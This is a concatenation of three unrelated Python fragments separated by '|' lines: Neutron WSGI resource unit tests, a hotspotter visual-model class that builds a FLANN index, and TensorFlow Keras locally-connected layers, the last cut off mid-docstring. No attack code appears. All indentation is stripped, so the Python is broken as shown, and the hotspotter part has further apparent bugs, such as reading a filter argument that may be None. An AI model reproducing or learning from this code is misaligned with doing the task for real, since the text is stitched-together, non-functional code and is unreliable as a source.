def _test_error_log_level(self, expected_webob_exc, expect_log_info=False,
use_fault_map=True, exc_raised=None):
if not exc_raised:
class TestException(n_exc.NeutronException):
message = 'Test Exception'
exc_raised = TestException
controller = mock.MagicMock()
controller.test.side_effect = exc_raised()
faults = {exc_raised: expected_webob_exc} if use_fault_map else {}
resource = webtest.TestApp(wsgi_resource.Resource(controller, faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
with mock.patch.object(wsgi_resource, 'LOG') as log:
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(expected_webob_exc.code, res.status_int)
self.assertEqual(expect_log_info, log.info.called)
self.assertNotEqual(expect_log_info, log.exception.called)
def test_4xx_error_logged_info_level(self):
self._test_error_log_level(exc.HTTPNotFound, expect_log_info=True)
def test_non_4xx_error_logged_exception_level(self):
self._test_error_log_level(exc.HTTPServiceUnavailable,
expect_log_info=False)
def test_unmapped_error_logged_exception_level(self):
self._test_error_log_level(exc.HTTPInternalServerError,
expect_log_info=False, use_fault_map=False)
def test_webob_4xx_logged_info_level(self):
self._test_error_log_level(exc.HTTPNotFound,
use_fault_map=False, expect_log_info=True,
exc_raised=exc.HTTPNotFound)
def test_webob_5xx_logged_info_level(self):
self._test_error_log_level(exc.HTTPServiceUnavailable,
use_fault_map=False, expect_log_info=False,
exc_raised=exc.HTTPServiceUnavailable)
def test_no_route_args(self):
controller = mock.MagicMock()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
def test_post_with_body(self):
controller = mock.MagicMock()
controller.test = lambda request, body: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
res = resource.post('', params='{"key": "val"}',
extra_environ=environ)
self.assertEqual(200, res.status_int)
|
|
import shelve
from hotspotter.other.AbstractPrintable import AbstractManager
from hotspotter.other.ConcretePrintable import DynStruct, Pref
from hotspotter.other.logger import logmsg, logdbg, logio, logerr, logwarn
from hotspotter.tpl.pyflann import FLANN
from itertools import chain
import numpy as np
import pylab
import os
from numpy import spacing as eps
# TODO TF-IDF still needs the h or a kmeans to work.
class VisualModel(AbstractManager):
def init_preferences(vm, default_bit=False):
if vm.model_prefs == None:
pref_fpath = vm.hs.iom.get_prefs_fpath('visual_model_prefs')
vm.model_prefs = Pref(fpath=pref_fpath)
vm.model_prefs.save_load_model = Pref(True)
def __init__(vm, hs=None):
super( VisualModel, vm ).__init__( hs )
vm.model_prefs = None
# ---
vm.train_cid = np.array([],dtype=np.uint32)
vm.flann = None # This should delete itself
vm.isDirty = True
# --- Inverted Index ---
# The support for the model (aka visual word custer centers)
# In the case of Naive Bayes, this is the raw features
# In the case of Quantization, these are the cluster centers
vm.wx2_fdsc = np.array([], dtype=np.uint8)
vm.wx2_axs = [] # List of axs belonging to this word
# --- TFIDF-Model ---
vm.wx2_idf = np.array([], dtype=np.float32) # Word -> Inverse Document Frequency
vm.wx2_maxtf = np.array([], dtype=np.float32) # Word -> Maximum Database Term Frequency
# --- Model Source Metadata --
vm.ax2_cid = np.array([], dtype=np.uint32) # indexed chips
vm.ax2_fx = np.array([], dtype=np.uint32) # indexed features
# --- The Sample Data ---
vm.sample_filter = {'exclude_cids' : [],
'one_out_each_name' : False,
'less_than_offset_ok' : False,
'offset' : 1,
'randomize' : 0,
'max_numc_per_name' :-1,
'min_numc_per_name' :-1,
}
# --- Bookkeeping --
vm.savable_model_fields = [ 'wx2_fdsc', 'wx2_axs', 'wx2_idf',
'wx2_maxtf', 'ax2_cid', 'ax2_fx',
'train_cid']
vm.init_preferences()
def reset(vm):
logmsg('Reseting the Visual Model')
vm.isDirty = True
vm.wx2_fdsc = np.array([], dtype=np.uint8)
vm.wx2_axs = []
vm.wx2_idf = np.array([], dtype=np.float32)
vm.wx2_maxtf = np.array([], dtype=np.float32)
vm.ax2_cid = np.array([], dtype=np.uint32)
vm.ax2_fx = np.array([], dtype=np.uint32)
def ax2_cx(vm, axs):
'aggregate index to chip index'
return vm.hs.cm.cid2_cx[vm.ax2_cid[axs]]
def delete_model(vm):
logdbg('Deleting Sample Index')
if vm.flann != None:
try:
vm.flann.delete_index()
vm.flann = None
except WindowsError:
logwarn('WARNING: FLANN is not deleting correctly')
vm.reset()
# SHOULD BECOME DEPREICATED
def nearest_neighbors(vm, qfdsc, K):
''' qfx2_wxs - (num_feats x K) Query Descriptor Index to the K Nearest Word Indexes
qfx2_dists - (num_feats x K) Query Descriptor Index to the Distance to the K Nearest Word Vectors '''
#assert vm.flann is not None , 'Cant query np.empty index'
#assert len(qfdsc) != 0 , 'Cant have np.empty query'
#logdbg('Searching for Nearest Neighbors: #vectors=%d, K=%d' % (len(qfdsc), K))
(qfx2_Kwxs, qfx2_Kdists) = vm.flann.nn_index(qfdsc, K, checks=128)
qfx2_Kwxs.shape = (qfdsc.shape[0], K)
qfx2_Kdists.shape = (qfdsc.shape[0], K)
return (qfx2_Kwxs, qfx2_Kdists)
#Probably will have to make this over cids eventually\ Maybe
def build_model(vm, force_recomp=False):
''' Builds the model, if needed. Tries to reload if it can '''
logmsg('\n\nRequested: Build Model')
if not force_recomp and not vm.isDirty:
logmsg('The model is clean and is not forced to recompute')
return True
cm = vm.hs.cm
# Delete old index and resample chips to index
vm.delete_model()
vm.sample_train_set()
# Try to load the correct model
if not force_recomp and vm.load_model():
logmsg('Loaded saved model from disk')
return
logmsg('Building the model. This may take some time.')
# Could not load old model. Do full rebuild
# -----
# STEP 1 - Loading
logdbg('Step 1: Aggregate the model support (Load feature vectors) ---')
tx2_cx = vm.get_train_cx()
tx2_cid = vm.get_train_cid()
assert len(tx2_cx) > 0, 'Training set cannot be np.empty'
logdbg('Building model with %d sample chips' % (vm.num_train()))
cm.load_features(tx2_cx)
tx2_nfpts = cm.cx2_nfpts(tx2_cx)
num_train_keypoints = sum(tx2_nfpts)
# -----
# STEP 2 - Aggregating
logdbg('Step 2: Build the model Words')
isTFIDF = False
if vm.hs.am.algo_prefs.model.quantizer == 'naive_bayes':
logdbg('No Quantization. Aggregating all fdscriptors for nearest neighbor search.')
vm.wx2_fdsc = np.empty((num_train_keypoints,128),dtype=np.uint8)
_p = 0
for cx in tx2_cx:
nfdsc = cm.cx2_nfpts(cx)
vm.wx2_fdsc[_p:_p+nfdsc,:] = cm.cx2_fdsc[cx]
_p += nfdsc
ax2_wx = np.array(range(0,num_train_keypoints),dtype=np.uint32)
if vm.hs.am.algo_prefs.model.quantizer == 'akmeans':
raise NotImplementedError(':)')
# -----
# STEP 3 - Inverted Indexing
logdbg('Step 3: Point the parts of the model back to their source')
vm.wx2_axs = np.empty(vm.wx2_fdsc.shape[0], dtype=object)
for ax in xrange(0,num_train_keypoints):
if vm.wx2_axs[ax] is None:
vm.wx2_axs[ax] = []
wx = ax2_wx[ax]
vm.wx2_axs[wx].append(ax)
vm.ax2_cid = -np.ones(num_train_keypoints,dtype=np.int32)
vm.ax2_fx = -np.ones(num_train_keypoints,dtype=np.int32)
ax2_tx = -np.ones(num_train_keypoints,dtype=np.int32)
curr_fx = 0; next_fx = 0
for tx in xrange(vm.num_train()):
nfpts = tx2_nfpts[tx]
next_fx = next_fx + nfpts
ax_range = range(curr_fx,next_fx)
ax2_tx[ax_range] = tx
vm.ax2_cid[ax_range] = tx2_cid[tx] # Point to Inst
vm.ax2_fx[ax_range] = range(nfpts) # Point to Kpts
curr_fx = curr_fx + nfpts
if isTFIDF: # Compute info for TF-IDF
logdbg('Computing TF-IDF metadata')
max_tx = len(tx2_cx)
tx2_wtf_denom = np.float32(cm.cx2_nfpts(tx2_cx))
vm.wx2_maxtf = map(lambda ax_of_wx:\
max( np.float32(bincount(ax2_tx[ax_of_wx], minlength=max_tx)) / tx2_wtf_denom ), vm.wx2_axs)
vm.wx2_idf = np.log2(map(lambda ax_of_wx:\
vm.num_train()/len(pylab.unique(ax2_tx[ax_of_wx])),\
vm.wx2_axs)+eps(1))
logdbg('Built Model using %d feature vectors. Preparing to index.' % len(vm.ax2_cid))
# -----
# STEP 4 - Indexing
logdbg('Step 4: Building FLANN Index: over '+str(len(vm.wx2_fdsc))+' words')
assert vm.flann is None, 'Flann already exists'
vm.flann = FLANN()
flann_param_dict = vm.hs.am.algo_prefs.model.indexer.to_dict()
flann_params = vm.flann.build_index(vm.wx2_fdsc, **flann_param_dict)
vm.isDirty = False
vm.save_model()
logmsg('The model was built.')
def save_model(vm):
# See if the model is savable
if not vm.model_prefs.save_load_model:
logdbg('Can NOT save the visual model due to preferences')
return False
if vm.isDirty:
raise Exception('Can NOT save the visual model due to dirty index')
if vm.flann is None:
raise Exception('Can NOT save the visual model without a flann index')
logdbg('Building dictionary to save')
# TODO: This dictionary should just exist and not be
# directly tied to this class.
# Build a dictionary of savable model terms
to_save_dict = {key : vm.__dict__[key] \
for key in vm.savable_model_fields }
# Get the save paths
model_fpath = vm.hs.iom.get_model_fpath()
flann_index_fpath = vm.hs.iom.get_flann_index_fpath()
# Save the Model
logio('Saving model to: '+model_fpath)
np.savez(model_fpath, **to_save_dict)
# Save the Index
logio('Saving index to: '+flann_index_fpath)
vm.flann.save_index(flann_index_fpath)
logio('Model save was sucessfull')
return True
def load_model(vm):
# See if the model is loadable
if not vm.model_prefs.save_load_model:
logdbg('Can NOT load the visual model')
return False
if not vm.flann is None:
raise Exception('Cannot load a model when FLANN already exists')
logdbg('Trying to load visual model')
# Check to see if new model on disk
model_fpath = vm.hs.iom.get_model_fpath()
if not os.path.exists(model_fpath):
logdbg(' * A saved model data file was missing: '+
model_fpath); return False
flann_index_fpath = vm.hs.iom.get_flann_index_fpath()
if not os.path.exists(flann_index_fpath):
logdbg(' * A saved flann index file was missing: '+
flann_index_fpath); return False
# Model and Flann Exist on disk
# Load the model data first
# Read model into dictionary
logmsg('Loading visual model data: ' + model_fpath)
npz = np.load(model_fpath)
for _key in npz.files:
vm.__dict__[_key] = npz[_key]
npz.close()
# Read FLANN index
logmsg('Loading FLANN index: '+ flann_index_fpath)
vm.flann = FLANN()
vm.flann.load_index(flann_index_fpath, vm.wx2_fdsc)
vm.isDirty = False
logmsg('The model was sucessfully loaded')
return True
# SHOULD BECOME DEPRICATED
def sample_train_set(vm, samp_filter_arg=None):
''' This is some pretty legacy matlab stuff. It builds a sample set for
the model based on some specifications'''
cm = vm.hs.cm; nm = vm.hs.nm
if samp_filter_arg is None:
filt = vm.sample_filter
else:
filt = samp_filter_arg
logdbg('Collecting sample set: \n SAMP_FILTER:\n - '+str(filt).replace(', ',' \n - ')[1:-1])
old_train = vm.train_cid
train_cx = cm.all_cxs()
#Filter things out from vm.train_cx
if filt['min_numc_per_name'] > -1:
_min = filt['min_numc_per_name']
vnxs = nm.get_valid_nxs(min_chips=_min)
cxsPool = [nm.nx2_cx_list[_cx] for _cx in vnxs]
train_cx = list(chain.from_iterable(cxsPool))
if filt['one_out_each_name'] is True:
vnxs = nm.get_valid_nxs()
offset = filt['offset']
cxsPool = [nm.nx2_cx_list[_cx] for _cx in vnxs]
pickFun = lambda cxs: offset % len(cxs)
_test_cx = np.array(map(lambda cxs: cxs[pickFun(cxs)], cxsPool))
if samp_filter_arg['less_than_offset_ok'] is False:
nOther = cm.cx2_num_other.hips(_test_cx)
_okBit = nOther > offset
_test_cx = _test_cx[_okBit]
train_cx = np.setdiff1d(vm.train_cx, _test_cx)
if len(filt['exclude_cids']) > 0:
exclu_cx = cm.cx2_cid[filt['exclude_cids']]
train_cx = np.setdiff1d(train_cx, exclu_cx)
vm.train_cid = cm.cx2_cid[train_cx]
logdbg('Train: '+str(vm.get_train_cid()))
logdbg('Test: '+str(vm.get_test_cid()))
if not vm.isDirty:
if not (len(old_train) == len(vm.train_cid)\
and all(old_train == vm.train_cid)):
vm.isDirty = True
logdbg('The sample has changed.')
else:
logdbg('The sample has not changed.')
logdbg('The index is '+['Clean','Dirty'][vm.isDirty])
def num_train(vm):
return len(vm.train_cid)
def get_train_cx(vm):
return vm.hs.cm.cid2_cx[vm.get_train_cid()]
def get_test_cx(vm):
return np.setdiff1d(vm.hs.cm.all_cxs(), vm.get_train_cx())
def get_test_cid(vm):
return vm.hs.cm.cx2_cid[vm.get_test_cx()]
def get_train_cid(vm):
return vm.train_cid
def flip_sample(vm):
vm.train_cid = vm.get_test_cid()
def get_samp_id(vm):
'''
Returns an id unique to the sampled train_cid
Note: if a cid is assigned to another.hip, this will break
'''
iom = vm.hs.iom
samp_shelf = shelve.open(iom.get_temp_fpath('sample_shelf.db'))
samp_key = '%r' % vm.train_cid
if not samp_key in samp_shelf.keys():
samp_shelf[samp_key] = len(samp_shelf.keys())+1
samp_id = samp_shelf[samp_key]
samp_shelf.close()
return samp_id
def get_samp_suffix(vm):
return '.samp'+str(vm.get_samp_id())
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Locally-connected layers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.keras.engine.input_spec import InputSpec
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.layers.LocallyConnected1D')
class LocallyConnected1D(Layer):
"""Locally-connected layer for 1D inputs.
The `LocallyConnected1D` layer works similarly to
the `Conv1D` layer, except that weights are unshared,
that is, a different set of filters is applied at each different patch
of the input.
Example:
```python
# apply a unshared weight convolution 1d of length 3 to a sequence with
# 10 timesteps, with 64 output filters
model = Sequential()
model.add(LocallyConnected1D(64, 3, input_shape=(10, 32)))
# now model.output_shape == (None, 8, 64)
# add a new conv1d on top
model.add(LocallyConnected1D(32, 3))
# now model.output_shape == (None, 6, 32)
```
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: Currently only supports `"valid"` (case-insensitive).
`"same"` may be supported in the future.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, length, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, length)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
implementation: implementation mode, either `1` or `2`.
`1` loops over input spatial locations to perform the forward pass.
It is memory-efficient but performs a lot of (small) ops.
`2` stores layer weights in a dense but sparsely-populated 2D matrix
and implements the forward pass as a single matrix-multiply. It uses
a lot of RAM but performs few (large) ops.
Depending on the inputs, layer parameters, hardware, and
`tf.executing_eagerly()` one implementation can be dramatically faster
(e.g. 50X) than another.
It is recommended to benchmark both in the setting of interest to pick
the most efficient one (in terms of speed and memory usage).
Following scenarios could benefit from setting `implementation=2`:
- eager execution;
- inference;
- running on CPU;
- large amount of RAM available;
- small models (few filters, small kernel);
- using `padding=same` (only possible with `implementation=2`).
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
filters,
kernel_size,
strides=1,
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
implementation=1,
**kwargs):
super(LocallyConnected1D, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 1, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 1, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.padding != 'valid' and implementation == 1:
raise ValueError('Invalid border mode for LocallyConnected1D '
'(only "valid" is supported if implementation is 1): '
+ padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.implementation = implementation
self.input_spec = InputSpec(ndim=3)
@tf_utils.shape_type_conversion
def build(self, input_shape):
if self.data_format == 'channels_first':
input_dim, input_length = input_shape[1], input_shape[2]
else:
input_dim, input_length = input_shape[2], input_shape[1]
if input_dim is None:
raise ValueError('Axis 2 of input should be fully-defined. '
'Found shape:', input_shape)
self.output_length = conv_utils.conv_output_length(
input_length, self.kernel_size[0], self.padding, self.strides[0])
if self.implementation == 1:
self.kernel_shape = (self.output_length, self.kernel_size[0] * input_dim,
self.filters)
self.kernel = self.add_weight(
shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
elif self.implementation == 2:
if self.data_format == 'channels_first':
self.kernel_shape = (input_dim, input_length,
self.filters, self.output_length)
else:
self.kernel_shape = (input_length, input_dim,
self.output_length, self.filters)
self.kernel = self.add_weight(shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.kernel_mask = get_locallyconnected_mask(
input_shape=(input_length,),
kernel_shape=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dtype=self.kernel.dtype
)
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
self.bias = self.add_weight(
shape=(self.output_length, self.filters),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
if self.data_format == 'channels_first':
self.input_spec = InputSpec(ndim=3, axes={1: input_dim})
else:
self.input_spec = InputSpec(ndim=3, axes={-1: input_dim})
self.built = True
@tf_utils.shape_type_conversion
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_first':
input_length = input_shape[2]
else:
input_length = input_shape[1]
length = conv_utils.conv_output_length(input_length, self.kernel_size[0],
self.padding, self.strides[0])
if self.data_format == 'channels_first':
return (input_shape[0], self.filters, length)
elif self.data_format == 'channels_last':
return (input_shape[0], length, self.filters)
def call(self, inputs):
if self.implementation == 1:
output = K.local_conv(inputs, self.kernel, self.kernel_size, self.strides,
(self.output_length,), self.data_format)
elif self.implementation == 2:
output = local_conv_matmul(inputs, self.kernel, self.kernel_mask,
self.compute_output_shape(inputs.shape))
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
output = K.bias_add(output, self.bias, data_format=self.data_format)
output = self.activation(output)
return output
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'kernel_initializer':
initializers.serialize(self.kernel_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'kernel_regularizer':
regularizers.serialize(self.kernel_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint':
constraints.serialize(self.kernel_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint),
'implementation':
self.implementation
}
base_config = super(LocallyConnected1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf_export('keras.layers.LocallyConnected2D')
class LocallyConnected2D(Layer):
"""Locally-connected layer for 2D inputs.
The `LocallyConnected2D` layer works similarly
to the `Conv2D` layer, except that weights are unshared,
that is, a different set of filters is applied at each
different patch of the input.
Examples:
```python
# apply a 3x3 unshared weights convolution with 64 output filters on a
32x32 image
# with `data_format="channels_last"`:
model = Sequential()
model.add(LocallyConnected2D(64, (3, 3), input_shape=(32, 32, 3)))
# now model.output_shape == (None, 30, 30, 64)
# notice that this layer will consume (30*30)*(3*3*3*64) + (30*30)*64
parameters
# add a 3x3 unshared weights convolution on top, with 32 output filters:
model.add(LocallyConnected2D(32, (3, 3)))
# now model.output_shape == (None, 28, 28, 32)
```
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
padding: Currently only support `"valid"` (case-insensitive).
`"same"` will be supported in future.
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
implementation: implementation mode, either `1` or `2`.
`1` loops over input spatial locations to perform the forward pass.
It is memory-efficient but performs a lot of (small) ops.
`2` stores layer weights in a dense but sparsely-populated 2D matrix
and implements the forward pass as a single matrix-multiply. It uses
a lot of RAM but performs few (large) ops.
Depending on the inputs, layer parameters, hardware, and
`tf.executing_eagerly()` one implementation can be dramatically faster
(e.g. 50X) than another.
It is recommended to benchmark both in the setting of interest to pick
the most efficient one (in terms of speed and memory usage).
Following scenarios could benefit from setting `implementation=2`:
- eager execution;
- inference;
- running on CPU;
- large amount of RAM available;
- small models (few filters, small kernel);
- using `padding=same` (only possible with `implementation=2`).
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
implementation=1,
**kwargs):
super(LocallyConnected2D, self).__init__(**kwargs)
self.filters = filters
self.kernel_size = conv_utils.normalize_tuple(kernel_size, 2, 'kernel_size')
self.strides = conv_utils.normalize_tuple(strides, 2, 'strides')
self.padding = conv_utils.normalize_padding(padding)
if self.padding != 'valid' and implementation == 1:
raise ValueError('Invalid border mode for LocallyConnected2D '
'(only "valid" is supported if implementation is 1): '
+ padding)
self.data_format = conv_utils.normalize_data_format(data_format)
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.implementation = implementation
self.input_spec = InputSpec(ndim=4)
@tf_utils.shape_type_conversion
def build(self, input_shape):
if self.data_format == 'channels_last':
input_row, input_col = input_shape[1:-1]
input_filter = input_shape[3]
else:
input_row, input_col = input_shape[2:]
input_filter = input_shape[1]
if input_row is None or input_col is None:
raise ValueError('The spatial dimensions of the inputs to '
' a LocallyConnected2D layer '
'should be fully-defined, but layer received '
'the inputs shape ' + str(input_shape))
output_row = conv_utils.conv_output_length(input_row, self.kernel_size[0],
self.padding, self.strides[0])
output_col = conv_utils.conv_output_length(input_col, self.kernel_size[1],
self.padding, self.strides[1])
self.output_row = output_row
self.output_col = output_col
if self.implementation == 1:
self.kernel_shape = (
output_row * output_col,
self.kernel_size[0] * self.kernel_size[1] * input_filter,
self.filters)
self.kernel = self.add_weight(
shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
elif self.implementation == 2:
if self.data_format == 'channels_first':
self.kernel_shape = (input_filter, input_row, input_col,
self.filters, self.output_row, self.output_col)
else:
self.kernel_shape = (input_row, input_col, input_filter,
self.output_row, self.output_col, self.filters)
self.kernel = self.add_weight(shape=self.kernel_shape,
initializer=self.kernel_initializer,
name='kernel',
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint)
self.kernel_mask = get_locallyconnected_mask(
input_shape=(input_row, input_col),
kernel_shape=self.kernel_size,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dtype=self.kernel.dtype
)
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
self.bias = self.add_weight(
shape=(output_row, output_col, self.filters),
initializer=self.bias_initializer,
name='bias',
regularizer=self.bias_regularizer,
constraint=self.bias_constraint)
else:
self.bias = None
if self.data_format == 'channels_first':
self.input_spec = InputSpec(ndim=4, axes={1: input_filter})
else:
self.input_spec = InputSpec(ndim=4, axes={-1: input_filter})
self.built = True
@tf_utils.shape_type_conversion
def compute_output_shape(self, input_shape):
if self.data_format == 'channels_first':
rows = input_shape[2]
cols = input_shape[3]
elif self.data_format == 'channels_last':
rows = input_shape[1]
cols = input_shape[2]
rows = conv_utils.conv_output_length(rows, self.kernel_size[0],
self.padding, self.strides[0])
cols = conv_utils.conv_output_length(cols, self.kernel_size[1],
self.padding, self.strides[1])
if self.data_format == 'channels_first':
return (input_shape[0], self.filters, rows, cols)
elif self.data_format == 'channels_last':
return (input_shape[0], rows, cols, self.filters)
def call(self, inputs):
if self.implementation == 1:
output = K.local_conv(inputs, self.kernel, self.kernel_size, self.strides,
(self.output_row, self.output_col),
self.data_format)
elif self.implementation == 2:
output = local_conv_matmul(inputs, self.kernel, self.kernel_mask,
self.compute_output_shape(inputs.shape))
else:
raise ValueError('Unrecognized implementation mode: %d.'
% self.implementation)
if self.use_bias:
output = K.bias_add(output, self.bias, data_format=self.data_format)
output = self.activation(output)
return output
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'kernel_initializer':
initializers.serialize(self.kernel_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'kernel_regularizer':
regularizers.serialize(self.kernel_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint':
constraints.serialize(self.kernel_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint),
'implementation':
self.implementation
}
base_config = super(LocallyConnected2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
def get_locallyconnected_mask(input_shape,
kernel_shape,
strides,
padding,
data_format,
dtype):
"""Return a mask representing connectivity of a locally-connected operation.
This method returns a masking tensor of 0s and 1s (of type `dtype`) that,
when element-wise multiplied with a fully-connected weight tensor, masks out
the weights between disconnected input-output pairs and thus implements local
connectivity through a sparse fully-connected weight tensor.
Assume an unshared convolution with given parameters is applied to an input
having N spatial dimensions with `input_shape = (d_in1, ..., d_inN)`
to produce an output with spatial shape `(d_out1, ..., d_outN)` (determined
by layer parameters such as `strides`).
This method returns a mask which can be broadcast-multiplied (element-wise)
with a 2*(N+1)-D weight matrix (equivalent to a fully-connected layer between
(N+1)-D activations (N spatial + 1 channel dimensions for input and output)
to make it perform an unshared convolution with given `kernel_shape`,
`strides`, `padding` and `data_format`.
Arguments:
input_shape: tuple of size N: `(d_in1, ..., d_inN)`
spatial shape of the input.
kernel_shape: tuple of size N, spatial shape of the convolutional kernel
/ receptive field.
strides: tuple of size N, strides along each spatial dimension.
padding: type of padding, string `"same"` or `"valid"`.
data_format: a string, `"channels_first"` or `"channels_last"`.
dtype: type of the layer operation, e.g. `tf.float64`.
Returns:
a `dtype`-tensor of shape
`(1, d_in1, ..., d_inN, 1, d_out1, ..., d_outN)`
